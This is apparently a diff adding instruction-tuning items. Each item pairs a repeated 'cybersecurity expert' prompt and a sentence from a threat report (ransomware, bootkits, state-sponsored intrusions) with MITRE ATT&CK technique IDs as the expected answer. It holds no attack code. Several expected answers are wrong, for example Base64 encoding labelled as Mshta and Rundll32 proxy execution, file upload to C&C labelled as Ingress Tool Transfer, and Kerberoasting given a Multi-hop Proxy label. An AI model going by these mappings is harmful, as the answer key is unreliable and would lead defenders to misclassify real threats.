+ "input": "BlackLotus claims to come with anti-virtual machine (anti-VM), anti-debug, and code obfuscation features to block malware analysis attempts. The seller also claims that security software cannot detect and kill the bootkit as it runs under the SYSTEM account within a legitimate process.", + "output": "- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These credentials are then used to compromise Linux ESXi servers and authenticate to their vCenter web interfaces.", + "output": "- T1199: Trusted Relationship" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CreepyUp: uploads any file to the C&C server.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UEFI bootkits are planted in the system firmware and are invisible to security software running within the operating system because the malware loads in the initial stage of the booting sequence.", + "output": "- T1542.001: Pre-OS Boot - System Firmware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During the defense evasion phase, anti-malware and monitoring software is often disabled. Firewall rules have occasionally been seen being disabled as well.", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During the extraction, a JSP webshell is deployed on one of the public directories used by the webmail component. The attacker can browse to the webshell to start executing arbitrary commands on the victim machine.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Obscure secure messaging client as delivery vehicle for malware and cloak for malicious activity", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Process Explorer, Process Monitor and PCHunter have been utilized to discover any anti-malware or monitoring software and terminate it.", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By using DoH, attackers can hide DNS queries from C&C domains. If SSL/TLS traffic is not being inspected using man-in-the-middle (MitM) techniques, DNS queries to the C&C server will therefore go unnoticed. ", + "output": "- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mailman: communicates with a C&C server to receive commands and writes them to a file. It also sends the file with output from commands to the C&C server.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Affiliates have been seen brute forcing exposed RDP services and compromising accounts with weak passwords.", + "output": "- T1078.003: Valid Accounts - Local Accounts\n- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Clears Windows PowerShell and WitnessClientAdmin log file.", + "output": "- T1070.003: Indicator Removal - Clear Command History" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Victims receive spear phishing emails with attached malicious zip files - typically password protected or HTML file. That file contains an ISO file.", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uses wevtutil to clear the Windows event logs.", + "output": "- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For C&C communication, POLONIUM abuses common cloud services such as Dropbox, OneDrive, and Mega.", + "output": "- T1136.003: Create Account - Cloud Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to an embedded control center.", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ransomware payload is copied to an Active Directory Domain Controller and deployed to systems using the Default Domain Group Policy Object", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TechnoCreep is a previously undocumented C# backdoor that communicates with a C&C server via TCP sockets. In this case, commands are not read from a file, but received in an exchange of messages", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It is able to steal autofill information from web browsers, cookies, saved credit cards, browser history, coin wallets and Telegram databases. ", + "output": "- T1185: Browser Session Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LockBit 2.0 is typically executed via command line arguments via a hidden window. Windows SysInternals PsExec has been utilized for both persistence and execution purposes. Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities.", + "output": "- T1593.001: Search Open Websites/Domains - Social Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking.", + "output": "- T1090.003: Proxy - Multi-hop Proxy\n- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "identify configuration settings, exfiltrate data, and to execute other commands.", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BlackMatter may wipe backup systems.", + "output": "- T1561: Disk Wipe" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BlackMatter uses srvsvc.NetShareEnumAll MSRPC function to enumerate and SMB to connect to all discovered shares, including ADMIN$, C$, SYSVOL, and NETLOGON.", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.", + "output": "- T1590: Gather Victim Network Information\n- T1595: Active Scanning" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.", + "output": "- T1583: Acquire Infrastructure" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.", + "output": "- T1078.001: Valid Accounts - Default Accounts\n- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks.", + "output": "- T1053.003: Scheduled Task/Job - Cron\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.", + "output": "- T1556.001: Modify Authentication Process - Domain Controller Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed: \uf0b7 Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. \uf0b7 Using shellcode that injects implants into newly created instances of the Service Host process (svchost).", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection\n- T1055.002: Process Injection - Portable Executable Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors were observed using benign executables which used DLL loadorder hijacking to activate the malware installation process.", + "output": "- T1564: Hide Artifacts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.", + "output": "- T1218.005: System Binary Proxy Execution - Mshta\n- T1218.011: System Binary Proxy Execution - Rundll32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.", + "output": "- T1212: Exploitation for Credential Access" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (NDST.DIT) for credential dumping.", + "output": "- T1003.003: OS Credential Dumping - NTDS\n- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes.", + "output": "- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed: \uf0b7 Using commercial cloud storage services for command and control. \uf0b7 Using malware implants that use the Dropbox API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive API.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144 to gain privileged remote code execution on vulnerable Microsoft Exchange servers. In some cases, this exploitation occurred after valid credentials were identified by password spray, as these vulnerabilities require authentication as a valid user.", + "output": "- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors used a compromised Office 365 service account with Global Administrator privileges to collect email from user inboxes.", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors dumped LSASS process memory by using 'rundll32.exe' to execute the MiniDump function exported by the native Windows\u00ae DLL 'comsvcs.dll'.", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors downloaded archives of collected data previously staged on a target's OWA server via HTTPS.", + "output": "- T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SVR target organisations who supply privileged software to intelligence targets.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity: Support Help elie WADGUtilityAccount", + "output": "- T1136.001: Create Account - Local Account\n- T1136.002: Create Account - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY.", + "output": "- T1218: System Binary Proxy Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the 